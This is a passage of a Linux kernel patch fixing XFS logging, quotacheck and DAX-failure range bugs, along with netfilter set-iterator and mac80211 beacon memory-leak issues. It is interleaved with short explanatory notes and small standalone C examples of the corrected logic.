++
++	/*
++	 * We are done with the log item transaction dirty state, so clear it so
++	 * that it doesn't pollute future transactions.
++	 */
++	iip->ili_dirty_flags = 0;
++	return 0;
++}
++
+ /*
+  * The logged size of an inode fork is always the current size of the inode
+  * fork. This means that when an inode fork is relogged, the size of the logged
+@@ -662,6 +809,8 @@ xfs_inode_item_committing(
+ }
+ 
+ static const struct xfs_item_ops xfs_inode_item_ops = {
++	.iop_sort	= xfs_inode_item_sort,
++	.iop_precommit	= xfs_inode_item_precommit,
+ 	.iop_size	= xfs_inode_item_size,
+ 	.iop_format	= xfs_inode_item_format,
+ 	.iop_pin	= xfs_inode_item_pin,
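
The iop_sort hook returns the inode number so that precommit processing
visits log items in ascending inode order, which is what keeps the cluster
buffer locking described above deadlock-free within a transaction.  A
standalone model of that ordering step (a plain qsort over a toy item array,
not the log item infrastructure):

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

struct log_item {
	uint64_t sort_key;	/* xfs_inode_item_sort() returns i_ino */
};

static int cmp_key(const void *a, const void *b)
{
	const struct log_item *la = a, *lb = b;

	if (la->sort_key < lb->sort_key)
		return -1;
	return la->sort_key > lb->sort_key;
}

int main(void)
{
	struct log_item items[] = { { 129 }, { 3 }, { 64 } };
	size_t i, n = sizeof(items) / sizeof(items[0]);

	qsort(items, n, sizeof(items[0]), cmp_key);
	for (i = 0; i < n; i++)	/* precommit order: 3, 64, 129 */
		printf("precommit inode %llu\n",
		       (unsigned long long)items[i].sort_key);
	return 0;
}
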
+diff --git a/fs/xfs/xfs_inode_item.h b/fs/xfs/xfs_inode_item.h
+index bbd836a44ff048..377e060078044e 100644
+--- a/fs/xfs/xfs_inode_item.h
++++ b/fs/xfs/xfs_inode_item.h
+@@ -17,6 +17,7 @@ struct xfs_inode_log_item {
+ 	struct xfs_log_item	ili_item;	   /* common portion */
+ 	struct xfs_inode	*ili_inode;	   /* inode ptr */
+ 	unsigned short		ili_lock_flags;	   /* inode lock flags */
++	unsigned int		ili_dirty_flags;   /* dirty in current tx */
+ 	/*
+ 	 * The ili_lock protects the interactions between the dirty state and
+ 	 * the flush state of the inode log item. This allows us to do atomic
+diff --git a/fs/xfs/xfs_itable.c b/fs/xfs/xfs_itable.c
+index a1c2bcf65d376f..44d603364d5a94 100644
+--- a/fs/xfs/xfs_itable.c
++++ b/fs/xfs/xfs_itable.c
+@@ -80,6 +80,17 @@ xfs_bulkstat_one_int(
+ 	if (error)
+ 		goto out;
+ 
++	/* Reload the incore unlinked list to avoid failure in inodegc. */
++	if (xfs_inode_unlinked_incomplete(ip)) {
++		error = xfs_inode_reload_unlinked_bucket(tp, ip);
++		if (error) {
++			xfs_iunlock(ip, XFS_ILOCK_SHARED);
++			xfs_force_shutdown(mp, SHUTDOWN_CORRUPT_INCORE);
++			xfs_irele(ip);
++			return error;
++		}
++	}
++
+ 	ASSERT(ip != NULL);
+ 	ASSERT(ip->i_imap.im_blkno != 0);
+ 	inode = VFS_I(ip);
+diff --git a/fs/xfs/xfs_log.c b/fs/xfs/xfs_log.c
+index d9aa5eab02c3f5..59c982297503c8 100644
+--- a/fs/xfs/xfs_log.c
++++ b/fs/xfs/xfs_log.c
+@@ -639,7 +639,6 @@ xfs_log_mount(
+ 	int		num_bblks)
+ {
+ 	struct xlog	*log;
+-	bool		fatal = xfs_has_crc(mp);
+ 	int		error = 0;
+ 	int		min_logfsbs;
+ 
+@@ -661,53 +660,37 @@ xfs_log_mount(
+ 	mp->m_log = log;
+ 
+ 	/*
+-	 * Validate the given log space and drop a critical message via syslog
+-	 * if the log size is too small that would lead to some unexpected
+-	 * situations in transaction log space reservation stage.
++	 * Now that we have set up the log and its internal geometry
++	 * parameters, we can validate the given log space and drop a critical
++	 * message via syslog if the log size is too small. A log that is too
++	 * small can lead to unexpected situations in transaction log space
++	 * reservation stage. The superblock verifier has already validated all
++	 * the other log geometry constraints, so we don't have to check those
++	 * here.
+ 	 *
+-	 * Note: we can't just reject the mount if the validation fails.  This
+-	 * would mean that people would have to downgrade their kernel just to
+-	 * remedy the situation as there is no way to grow the log (short of
+-	 * black magic surgery with xfs_db).
++	 * Note: For v4 filesystems, we can't just reject the mount if the
++	 * validation fails.  This would mean that people would have to
++	 * downgrade their kernel just to remedy the situation as there is no
++	 * way to grow the log (short of black magic surgery with xfs_db).
+ 	 *
+-	 * We can, however, reject mounts for CRC format filesystems, as the
++	 * We can, however, reject mounts for V5 format filesystems, as the
+ 	 * mkfs binary being used to make the filesystem should never create a
+ 	 * filesystem with a log that is too small.
+ 	 */
+ 	min_logfsbs = xfs_log_calc_minimum_size(mp);
+-
+ 	if (mp->m_sb.sb_logblocks < min_logfsbs) {
+ 		xfs_warn(mp,
+ 		"Log size %d blocks too small, minimum size is %d blocks",
+ 			 mp->m_sb.sb_logblocks, min_logfsbs);
+-		error = -EINVAL;
+-	} else if (mp->m_sb.sb_logblocks > XFS_MAX_LOG_BLOCKS) {
+-		xfs_warn(mp,
+-		"Log size %d blocks too large, maximum size is %lld blocks",
+-			 mp->m_sb.sb_logblocks, XFS_MAX_LOG_BLOCKS);
+-		error = -EINVAL;
+-	} else if (XFS_FSB_TO_B(mp, mp->m_sb.sb_logblocks) > XFS_MAX_LOG_BYTES) {
+-		xfs_warn(mp,
+-		"log size %lld bytes too large, maximum size is %lld bytes",
+-			 XFS_FSB_TO_B(mp, mp->m_sb.sb_logblocks),
+-			 XFS_MAX_LOG_BYTES);
+-		error = -EINVAL;
+-	} else if (mp->m_sb.sb_logsunit > 1 &&
+-		   mp->m_sb.sb_logsunit % mp->m_sb.sb_blocksize) {
+-		xfs_warn(mp,
+-		"log stripe unit %u bytes must be a multiple of block size",
+-			 mp->m_sb.sb_logsunit);
+-		error = -EINVAL;
+-		fatal = true;
+-	}
+-	if (error) {
++
+ 		/*
+ 		 * Log check errors are always fatal on v5; or whenever bad
+ 		 * metadata leads to a crash.
+ 		 */
+-		if (fatal) {
++		if (xfs_has_crc(mp)) {
+ 			xfs_crit(mp, "AAIEEE! Log failed size checks. Abort!");
+ 			ASSERT(0);
++			error = -EINVAL;
+ 			goto out_free_log;
+ 		}
+ 		xfs_crit(mp, "Log size out of supported range.");
+diff --git a/fs/xfs/xfs_log_recover.c b/fs/xfs/xfs_log_recover.c
+index 05e48523ea400d..affe94356ed14e 100644
+--- a/fs/xfs/xfs_log_recover.c
++++ b/fs/xfs/xfs_log_recover.c
+@@ -2711,7 +2711,9 @@ xlog_recover_iunlink_bucket(
+ 			 * just to flush the inodegc queue and wait for it to
+ 			 * complete.
+ 			 */
+-			xfs_inodegc_flush(mp);
++			error = xfs_inodegc_flush(mp);
++			if (error)
++				break;
+ 		}
+ 
+ 		prev_agino = agino;
+@@ -2719,10 +2721,15 @@ xlog_recover_iunlink_bucket(
+ 	}
+ 
+ 	if (prev_ip) {
++		int	error2;
++
+ 		ip->i_prev_unlinked = prev_agino;
+ 		xfs_irele(prev_ip);
++
++		error2 = xfs_inodegc_flush(mp);
++		if (error2 && !error)
++			return error2;
+ 	}
+-	xfs_inodegc_flush(mp);
+ 	return error;
+ }
+ 
+@@ -2789,7 +2796,6 @@ xlog_recover_iunlink_ag(
+ 			 * bucket and remaining inodes on it unreferenced and
+ 			 * unfreeable.
+ 			 */
+-			xfs_inodegc_flush(pag->pag_mount);
+ 			xlog_recover_clear_agi_bucket(pag, bucket);
+ 		}
+ 	}
+@@ -2806,13 +2812,6 @@ xlog_recover_process_iunlinks(
+ 
+ 	for_each_perag(log->l_mp, agno, pag)
+ 		xlog_recover_iunlink_ag(pag);
+-
+-	/*
+-	 * Flush the pending unlinked inodes to ensure that the inactivations
+-	 * are fully completed on disk and the incore inodes can be reclaimed
+-	 * before we signal that recovery is complete.
+-	 */
+-	xfs_inodegc_flush(log->l_mp);
+ }
+ 
+ STATIC void
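
One detail worth noting in the xlog_recover_iunlink_bucket() hunk above is
the error2 plumbing: a failure from the final xfs_inodegc_flush() is reported
only when no earlier error occurred, so the first failure wins.  The pattern
in isolation, with invented error values:

#include <stdio.h>

static int cleanup(void)
{
	return -5;	/* pretend the flush failed with -EIO */
}

int main(void)
{
	int error = -22;	/* pretend an earlier step failed, -EINVAL */
	int error2 = cleanup();

	if (error2 && !error)
		error = error2;	/* adopt error2 only if nothing failed yet */
	printf("reported error: %d\n", error);
	return 0;
}
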
+diff --git a/fs/xfs/xfs_mount.h b/fs/xfs/xfs_mount.h
+index 69ddd531963444..9dc0acf7314f6d 100644
+--- a/fs/xfs/xfs_mount.h
++++ b/fs/xfs/xfs_mount.h
+@@ -62,6 +62,7 @@ struct xfs_error_cfg {
+ struct xfs_inodegc {
+ 	struct llist_head	list;
+ 	struct delayed_work	work;
++	int			error;
+ 
+ 	/* approximate count of inodes in the list */
+ 	unsigned int		items;
+@@ -400,6 +401,8 @@ __XFS_HAS_FEAT(nouuid, NOUUID)
+ #define XFS_OPSTATE_WARNED_SHRINK	8
+ /* Kernel has logged a warning about logged xattr updates being used. */
+ #define XFS_OPSTATE_WARNED_LARP		9
++/* Mount time quotacheck is running */
++#define XFS_OPSTATE_QUOTACHECK_RUNNING	10
+ 
+ #define __XFS_IS_OPSTATE(name, NAME) \
+ static inline bool xfs_is_ ## name (struct xfs_mount *mp) \
+@@ -422,6 +425,11 @@ __XFS_IS_OPSTATE(inode32, INODE32)
+ __XFS_IS_OPSTATE(readonly, READONLY)
+ __XFS_IS_OPSTATE(inodegc_enabled, INODEGC_ENABLED)
+ __XFS_IS_OPSTATE(blockgc_enabled, BLOCKGC_ENABLED)
++#ifdef CONFIG_XFS_QUOTA
++__XFS_IS_OPSTATE(quotacheck_running, QUOTACHECK_RUNNING)
++#else
++# define xfs_is_quotacheck_running(mp)	(false)
++#endif
+ 
+ static inline bool
+ xfs_should_warn(struct xfs_mount *mp, long nr)
+@@ -439,7 +447,8 @@ xfs_should_warn(struct xfs_mount *mp, long nr)
+ 	{ (1UL << XFS_OPSTATE_BLOCKGC_ENABLED),		"blockgc" }, \
+ 	{ (1UL << XFS_OPSTATE_WARNED_SCRUB),		"wscrub" }, \
+ 	{ (1UL << XFS_OPSTATE_WARNED_SHRINK),		"wshrink" }, \
+-	{ (1UL << XFS_OPSTATE_WARNED_LARP),		"wlarp" }
++	{ (1UL << XFS_OPSTATE_WARNED_LARP),		"wlarp" }, \
++	{ (1UL << XFS_OPSTATE_QUOTACHECK_RUNNING),	"quotacheck" }
+ 
+ /*
+  * Max and min values for mount-option defined I/O
+diff --git a/fs/xfs/xfs_notify_failure.c b/fs/xfs/xfs_notify_failure.c
+index c4078d0ec108f1..a7daa522e00fe7 100644
+--- a/fs/xfs/xfs_notify_failure.c
++++ b/fs/xfs/xfs_notify_failure.c
+@@ -114,7 +114,8 @@ xfs_dax_notify_ddev_failure(
+ 	int			error = 0;
+ 	xfs_fsblock_t		fsbno = XFS_DADDR_TO_FSB(mp, daddr);
+ 	xfs_agnumber_t		agno = XFS_FSB_TO_AGNO(mp, fsbno);
+-	xfs_fsblock_t		end_fsbno = XFS_DADDR_TO_FSB(mp, daddr + bblen);
++	xfs_fsblock_t		end_fsbno = XFS_DADDR_TO_FSB(mp,
++							     daddr + bblen - 1);
+ 	xfs_agnumber_t		end_agno = XFS_FSB_TO_AGNO(mp, end_fsbno);
+ 
+ 	error = xfs_trans_alloc_empty(mp, &tp);
+@@ -125,8 +126,8 @@ xfs_dax_notify_ddev_failure(
+ 		struct xfs_rmap_irec	ri_low = { };
+ 		struct xfs_rmap_irec	ri_high;
+ 		struct xfs_agf		*agf;
+-		xfs_agblock_t		agend;
+ 		struct xfs_perag	*pag;
++		xfs_agblock_t		range_agend;
+ 
+ 		pag = xfs_perag_get(mp, agno);
+ 		error = xfs_alloc_read_agf(pag, tp, 0, &agf_bp);
+@@ -147,10 +148,10 @@ xfs_dax_notify_ddev_failure(
+ 			ri_high.rm_startblock = XFS_FSB_TO_AGBNO(mp, end_fsbno);
+ 
+ 		agf = agf_bp->b_addr;
+-		agend = min(be32_to_cpu(agf->agf_length),
++		range_agend = min(be32_to_cpu(agf->agf_length) - 1,
+ 				ri_high.rm_startblock);
+ 		notify.startblock = ri_low.rm_startblock;
+-		notify.blockcount = agend - ri_low.rm_startblock;
++		notify.blockcount = range_agend + 1 - ri_low.rm_startblock;
+ 
+ 		error = xfs_rmap_query_range(cur, &ri_low, &ri_high,
+ 				xfs_dax_failure_fn, &notify);
+@@ -210,7 +211,7 @@ xfs_dax_notify_failure(
+ 	ddev_end = ddev_start + bdev_nr_bytes(mp->m_ddev_targp->bt_bdev) - 1;
+ 
+ 	/* Ignore the range out of filesystem area */
+-	if (offset + len < ddev_start)
++	if (offset + len - 1 < ddev_start)
+ 		return -ENXIO;
+ 	if (offset > ddev_end)
+ 		return -ENXIO;
+@@ -222,8 +223,8 @@ xfs_dax_notify_failure(
+ 		len -= ddev_start - offset;
+ 		offset = 0;
+ 	}
+-	if (offset + len > ddev_end)
+-		len -= ddev_end - offset;
++	if (offset + len - 1 > ddev_end)
++		len = ddev_end - offset + 1;
+ 
+ 	return xfs_dax_notify_ddev_failure(mp, BTOBB(offset), BTOBB(len),
+ 			mf_flags);
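
The xfs_notify_failure.c hunks above all correct the same class of
off-by-one: a byte range of length len starting at offset ends at
offset + len - 1, not offset + len, so comparisons and clamping must use
inclusive ends.  A self-contained illustration of the corrected arithmetic:

#include <stdio.h>

int main(void)
{
	unsigned long long offset = 4096, len = 8192;
	unsigned long long dev_end = 8191;	/* last valid byte on the device */

	/* Clamp the range to the device using inclusive end points. */
	if (offset + len - 1 > dev_end)
		len = dev_end - offset + 1;

	printf("notified range: bytes [%llu, %llu]\n",
	       offset, offset + len - 1);
	return 0;
}
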
+diff --git a/fs/xfs/xfs_qm.c b/fs/xfs/xfs_qm.c
+index 18bb4ec4d7c9b4..bd907bbc389cf3 100644
+--- a/fs/xfs/xfs_qm.c
++++ b/fs/xfs/xfs_qm.c
+@@ -422,6 +422,14 @@ xfs_qm_dquot_isolate(
+ 	if (!xfs_dqlock_nowait(dqp))
+ 		goto out_miss_busy;
+ 
++	/*
++	 * If something else is freeing this dquot and hasn't yet removed it
++	 * from the LRU, leave it for the freeing task to complete the freeing
++	 * process rather than risk it being freed from under us here.
++	 */
++	if (dqp->q_flags & XFS_DQFLAG_FREEING)
++		goto out_miss_unlock;
++
+ 	/*
+ 	 * This dquot has acquired a reference in the meantime remove it from
+ 	 * the freelist and try again.
+@@ -441,10 +449,8 @@ xfs_qm_dquot_isolate(
+ 	 * skip it so there is time for the IO to complete before we try to
+ 	 * reclaim it again on the next LRU pass.
+ 	 */
+-	if (!xfs_dqflock_nowait(dqp)) {
+-		xfs_dqunlock(dqp);
+-		goto out_miss_busy;
+-	}
++	if (!xfs_dqflock_nowait(dqp))
++		goto out_miss_unlock;
+ 
+ 	if (XFS_DQ_IS_DIRTY(dqp)) {
+ 		struct xfs_buf	*bp = NULL;
+@@ -478,6 +484,8 @@ xfs_qm_dquot_isolate(
+ 	XFS_STATS_INC(dqp->q_mount, xs_qm_dqreclaims);
+ 	return LRU_REMOVED;
+ 
++out_miss_unlock:
++	xfs_dqunlock(dqp);
+ out_miss_busy:
+ 	trace_xfs_dqreclaim_busy(dqp);
+ 	XFS_STATS_INC(dqp->q_mount, xs_qm_dqreclaim_misses);
+@@ -1152,6 +1160,19 @@ xfs_qm_dqusage_adjust(
+ 	if (error)
+ 		return error;
+ 
++	/*
++	 * Reload the incore unlinked list to avoid failure in inodegc.
++	 * Use an unlocked check here because unrecovered unlinked inodes
++	 * should be somewhat rare.
++	 */
++	if (xfs_inode_unlinked_incomplete(ip)) {
++		error = xfs_inode_reload_unlinked(ip);
++		if (error) {
++			xfs_force_shutdown(mp, SHUTDOWN_CORRUPT_INCORE);
++			goto error0;
++		}
++	}
++
+ 	ASSERT(ip->i_delayed_blks == 0);
+ 
+ 	if (XFS_IS_REALTIME_INODE(ip)) {
+@@ -1165,6 +1186,7 @@ xfs_qm_dqusage_adjust(
+ 	}
+ 
+ 	nblks = (xfs_qcnt_t)ip->i_nblocks - rtblks;
++	xfs_iflags_clear(ip, XFS_IQUOTAUNCHECKED);
+ 
+ 	/*
+ 	 * Add the (disk blocks and inode) resources occupied by this
+@@ -1311,17 +1333,18 @@ xfs_qm_quotacheck(
+ 		flags |= XFS_PQUOTA_CHKD;
+ 	}
+ 
++	xfs_set_quotacheck_running(mp);
+ 	error = xfs_iwalk_threaded(mp, 0, 0, xfs_qm_dqusage_adjust, 0, true,
+ 			NULL);
+-	if (error) {
+-		/*
+-		 * The inode walk may have partially populated the dquot
+-		 * caches.  We must purge them before disabling quota and
+-		 * tearing down the quotainfo, or else the dquots will leak.
+-		 */
+-		xfs_qm_dqpurge_all(mp);
+-		goto error_return;
+-	}
++	xfs_clear_quotacheck_running(mp);
++
++	/*
++	 * On error, the inode walk may have partially populated the dquot
++	 * caches.  We must purge them before disabling quota and tearing down
++	 * the quotainfo, or else the dquots will leak.
++	 */
++	if (error)
++		goto error_purge;
+ 
+ 	/*
+ 	 * We've made all the changes that we need to make incore.  Flush them
+@@ -1355,10 +1378,8 @@ xfs_qm_quotacheck(
+ 	 * and turn quotaoff. The dquots won't be attached to any of the inodes
+ 	 * at this point (because we intentionally didn't in dqget_noattach).
+ 	 */
+-	if (error) {
+-		xfs_qm_dqpurge_all(mp);
+-		goto error_return;
+-	}
++	if (error)
++		goto error_purge;
+ 
+ 	/*
+ 	 * If one type of quotas is off, then it will lose its
+@@ -1368,7 +1389,7 @@ xfs_qm_quotacheck(
+ 	mp->m_qflags &= ~XFS_ALL_QUOTA_CHKD;
+ 	mp->m_qflags |= flags;
+ 
+- error_return:
++error_return:
+ 	xfs_buf_delwri_cancel(&buffer_list);
+ 
+ 	if (error) {
+@@ -1387,6 +1408,21 @@ xfs_qm_quotacheck(
+ 	} else
+ 		xfs_notice(mp, "Quotacheck: Done.");
+ 	return error;
++
++error_purge:
++	/*
++	 * On error, we may have inodes queued for inactivation. This may try
++	 * to attach dquots to the inode before running cleanup operations on
++	 * the inode and this can race with the xfs_qm_destroy_quotainfo() call
++	 * below that frees mp->m_quotainfo. To avoid this race, flush all the
++	 * pending inodegc operations before we purge the dquots from memory,
++	 * ensuring that background inactivation is idle whilst we turn off
++	 * quotas.
++	 */
++	xfs_inodegc_flush(mp);
++	xfs_qm_dqpurge_all(mp);
++	goto error_return;
++
+ }
+ 
+ /*
+diff --git a/fs/xfs/xfs_super.c b/fs/xfs/xfs_super.c
+index 12662b169b716e..1c143c69da6ede 100644
+--- a/fs/xfs/xfs_super.c
++++ b/fs/xfs/xfs_super.c
+@@ -1089,6 +1089,7 @@ xfs_inodegc_init_percpu(
+ #endif
+ 		init_llist_head(&gc->list);
+ 		gc->items = 0;
++		gc->error = 0;
+ 		INIT_DELAYED_WORK(&gc->work, xfs_inodegc_worker);
+ 	}
+ 	return 0;
+diff --git a/fs/xfs/xfs_trace.h b/fs/xfs/xfs_trace.h
+index 372d871bccc5eb..0cd62031e53f58 100644
+--- a/fs/xfs/xfs_trace.h
++++ b/fs/xfs/xfs_trace.h
+@@ -1877,6 +1877,7 @@ DEFINE_ALLOC_EVENT(xfs_alloc_small_notenough);
+ DEFINE_ALLOC_EVENT(xfs_alloc_small_done);
+ DEFINE_ALLOC_EVENT(xfs_alloc_small_error);
+ DEFINE_ALLOC_EVENT(xfs_alloc_vextent_badargs);
++DEFINE_ALLOC_EVENT(xfs_alloc_vextent_skip_deadlock);
+ DEFINE_ALLOC_EVENT(xfs_alloc_vextent_nofix);
+ DEFINE_ALLOC_EVENT(xfs_alloc_vextent_noagbp);
+ DEFINE_ALLOC_EVENT(xfs_alloc_vextent_loopfailed);
+@@ -3678,6 +3679,51 @@ TRACE_EVENT(xfs_iunlink_update_dinode,
+ 		  __entry->new_ptr)
+ );
+ 
++TRACE_EVENT(xfs_iunlink_reload_next,
++	TP_PROTO(struct xfs_inode *ip),
++	TP_ARGS(ip),
++	TP_STRUCT__entry(
++		__field(dev_t, dev)
++		__field(xfs_agnumber_t, agno)
++		__field(xfs_agino_t, agino)
++		__field(xfs_agino_t, prev_agino)
++		__field(xfs_agino_t, next_agino)
++	),
++	TP_fast_assign(
++		__entry->dev = ip->i_mount->m_super->s_dev;
++		__entry->agno = XFS_INO_TO_AGNO(ip->i_mount, ip->i_ino);
++		__entry->agino = XFS_INO_TO_AGINO(ip->i_mount, ip->i_ino);
++		__entry->prev_agino = ip->i_prev_unlinked;
++		__entry->next_agino = ip->i_next_unlinked;
++	),
++	TP_printk("dev %d:%d agno 0x%x agino 0x%x prev_unlinked 0x%x next_unlinked 0x%x",
++		  MAJOR(__entry->dev), MINOR(__entry->dev),
++		  __entry->agno,
++		  __entry->agino,
++		  __entry->prev_agino,
++		  __entry->next_agino)
++);
++
++TRACE_EVENT(xfs_inode_reload_unlinked_bucket,
++	TP_PROTO(struct xfs_inode *ip),
++	TP_ARGS(ip),
++	TP_STRUCT__entry(
++		__field(dev_t, dev)
++		__field(xfs_agnumber_t, agno)
++		__field(xfs_agino_t, agino)
++	),
++	TP_fast_assign(
++		__entry->dev = ip->i_mount->m_super->s_dev;
++		__entry->agno = XFS_INO_TO_AGNO(ip->i_mount, ip->i_ino);
++		__entry->agino = XFS_INO_TO_AGINO(ip->i_mount, ip->i_ino);
++	),
++	TP_printk("dev %d:%d agno 0x%x agino 0x%x bucket %u",
++		  MAJOR(__entry->dev), MINOR(__entry->dev),
++		  __entry->agno,
++		  __entry->agino,
++		  __entry->agino % XFS_AGI_UNLINKED_BUCKETS)
++);
++
+ DECLARE_EVENT_CLASS(xfs_ag_inode_class,
+ 	TP_PROTO(struct xfs_inode *ip),
+ 	TP_ARGS(ip),
+diff --git a/fs/xfs/xfs_trans.c b/fs/xfs/xfs_trans.c
+index 7bd16fbff53410..b45879868f90fc 100644
+--- a/fs/xfs/xfs_trans.c
++++ b/fs/xfs/xfs_trans.c
+@@ -290,7 +290,9 @@ xfs_trans_alloc(
+ 		 * Do not perform a synchronous scan because callers can hold
+ 		 * other locks.
+ 		 */
+-		xfs_blockgc_flush_all(mp);
++		error = xfs_blockgc_flush_all(mp);
++		if (error)
++			return error;
+ 		want_retry = false;
+ 		goto retry;
+ 	}
+@@ -970,6 +972,11 @@ __xfs_trans_commit(
+ 		error = xfs_defer_finish_noroll(&tp);
+ 		if (error)
+ 			goto out_unreserve;
++
++		/* Run precommits from final tx in defer chain. */
++		error = xfs_trans_run_precommits(tp);
++		if (error)
++			goto out_unreserve;
+ 	}
+ 
+ 	/*
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index e365302fed95db..c24b04235d9131 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -296,9 +296,22 @@ struct nft_set_elem {
+ 	void			*priv;
+ };
+ 
++/**
++ * enum nft_iter_type - nftables set iterator type
++ *
++ * @NFT_ITER_READ: read-only iteration over set elements
++ * @NFT_ITER_UPDATE: iteration under mutex to update set element state
++ */
++enum nft_iter_type {
++	NFT_ITER_UNSPEC,
++	NFT_ITER_READ,
++	NFT_ITER_UPDATE,
++};
++
+ struct nft_set;
+ struct nft_set_iter {
+ 	u8		genmask;
++	enum nft_iter_type type:8;
+ 	unsigned int	count;
+ 	unsigned int	skip;
+ 	int		err;
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 419baf8efddea2..0685ae2ea64eb0 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -5196,8 +5196,10 @@ ieee80211_beacon_get_ap(struct ieee80211_hw *hw,
+ 	if (beacon->tail)
+ 		skb_put_data(skb, beacon->tail, beacon->tail_len);
+ 
+-	if (ieee80211_beacon_protect(skb, local, sdata, link) < 0)
++	if (ieee80211_beacon_protect(skb, local, sdata, link) < 0) {
++		dev_kfree_skb(skb);
+ 		return NULL;
++	}
+ 
+ 	ieee80211_beacon_get_finish(hw, vif, link, offs, beacon, skb,
+ 				    chanctx_conf, csa_off_base);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 63b7be0a95d04c..25a9bce8cd3a4d 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -628,6 +628,7 @@ static void nft_map_deactivate(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	struct nft_set_iter iter = {
+ 		.genmask	= nft_genmask_next(ctx->net),
++		.type		= NFT_ITER_UPDATE,
+ 		.fn		= nft_mapelem_deactivate,
+ 	};
+ 
+@@ -5143,6 +5144,7 @@ int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 		}
+ 
+ 		iter.genmask	= nft_genmask_next(ctx->net);
++		iter.type	= NFT_ITER_UPDATE;
+ 		iter.skip 	= 0;
+ 		iter.count	= 0;
+ 		iter.err	= 0;
+@@ -5218,6 +5220,7 @@ static void nft_map_activate(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	struct nft_set_iter iter = {
+ 		.genmask	= nft_genmask_next(ctx->net),
++		.type		= NFT_ITER_UPDATE,
+ 		.fn		= nft_mapelem_activate,
+ 	};
+ 
+@@ -5574,6 +5577,7 @@ static int nf_tables_dump_set(struct sk_buff *skb, struct netlink_callback *cb)
+ 	args.cb			= cb;
+ 	args.skb		= skb;
+ 	args.iter.genmask	= nft_genmask_cur(net);
++	args.iter.type		= NFT_ITER_READ;
+ 	args.iter.skip		= cb->args[0];
+ 	args.iter.count		= 0;
+ 	args.iter.err		= 0;
+@@ -6957,6 +6961,7 @@ static int nft_set_flush(struct nft_ctx *ctx, struct nft_set *set, u8 genmask)
+ {
+ 	struct nft_set_iter iter = {
+ 		.genmask	= genmask,
++		.type		= NFT_ITER_UPDATE,
+ 		.fn		= nft_setelem_flush,
+ 	};
+ 
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index 33daee2e54c5ca..fc0ac535d0d8e1 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -211,6 +211,7 @@ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 		return 0;
+ 
+ 	iter.genmask	= nft_genmask_next(ctx->net);
++	iter.type	= NFT_ITER_UPDATE;
+ 	iter.skip	= 0;
+ 	iter.count	= 0;
+ 	iter.err	= 0;
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index d9c1c467ea6848..8336f2052f2258 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -2042,13 +2042,15 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 			    struct nft_set_iter *iter)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+-	struct net *net = read_pnet(&set->net);
+ 	const struct nft_pipapo_match *m;
+ 	const struct nft_pipapo_field *f;
+ 	int i, r;
+ 
++	WARN_ON_ONCE(iter->type != NFT_ITER_READ &&
++		     iter->type != NFT_ITER_UPDATE);
++
+ 	rcu_read_lock();
+-	if (iter->genmask == nft_genmask_cur(net))
++	if (iter->type == NFT_ITER_READ)
+ 		m = rcu_dereference(priv->match);
+ 	else
+ 		m = priv->clone;
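
With the explicit iterator type, the pipapo walk no longer guesses from the
genmask which copy of the set it should traverse: read-only walks see the
RCU-published match, while update walks under the transaction mutex see the
private clone.  A toy model of that dispatch (illustrative names, not the
nftables API):

#include <stdio.h>

enum iter_type { ITER_READ, ITER_UPDATE };

struct set {
	const char *published;	/* what RCU readers dereference */
	const char *clone;	/* what the current transaction mutates */
};

static const char *match_for(const struct set *s, enum iter_type type)
{
	return type == ITER_READ ? s->published : s->clone;
}

int main(void)
{
	struct set s = { "generation-1 match", "generation-2 clone" };

	printf("dump walk sees:   %s\n", match_for(&s, ITER_READ));
	printf("update walk sees: %s\n", match_for(&s, ITER_UPDATE));
	return 0;
}
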
+diff --git a/net/netfilter/nft_socket.c b/net/netfilter/nft_socket.c
+index 0f37738e4b26a4..4148df6d6a4713 100644
+--- a/net/netfilter/nft_socket.c
++++ b/net/netfilter/nft_socket.c
+@@ -9,7 +9,8 @@
+ 
+ struct nft_socket {
+ 	enum nft_socket_keys		key:8;
+-	u8				level;
++	u8				level;		/* cgroupv2 level to extract */
++	u8				level_user;	/* cgroupv2 level provided by userspace */
+ 	u8				len;
+ 	union {
+ 		u8			dreg;
+@@ -53,6 +54,28 @@ nft_sock_get_eval_cgroupv2(u32 *dest, struct sock *sk, const struct nft_pktinfo
+ 	memcpy(dest, &cgid, sizeof(u64));
+ 	return true;
+ }
++
++/* process context only, uses current->nsproxy. */
++static noinline int nft_socket_cgroup_subtree_level(void)
++{
++	struct cgroup *cgrp = cgroup_get_from_path("/");
++	int level;
++
++	if (IS_ERR(cgrp))
++		return PTR_ERR(cgrp);
++
++	level = cgrp->level;
++
++	cgroup_put(cgrp);
++
++	if (WARN_ON_ONCE(level > 255))
++		return -ERANGE;
++
++	if (WARN_ON_ONCE(level < 0))
++		return -EINVAL;
++
++	return level;
++}
+ #endif
+ 
+ static struct sock *nft_socket_do_lookup(const struct nft_pktinfo *pkt)
+@@ -174,9 +197,10 @@ static int nft_socket_init(const struct nft_ctx *ctx,
+ 	case NFT_SOCKET_MARK:
+ 		len = sizeof(u32);
+ 		break;
+-#ifdef CONFIG_CGROUPS
++#ifdef CONFIG_SOCK_CGROUP_DATA
+ 	case NFT_SOCKET_CGROUPV2: {
+ 		unsigned int level;
++		int err;
+ 
+ 		if (!tb[NFTA_SOCKET_LEVEL])
+ 			return -EINVAL;
+@@ -185,6 +209,17 @@ static int nft_socket_init(const struct nft_ctx *ctx,
+ 		if (level > 255)
+ 			return -EOPNOTSUPP;
+ 
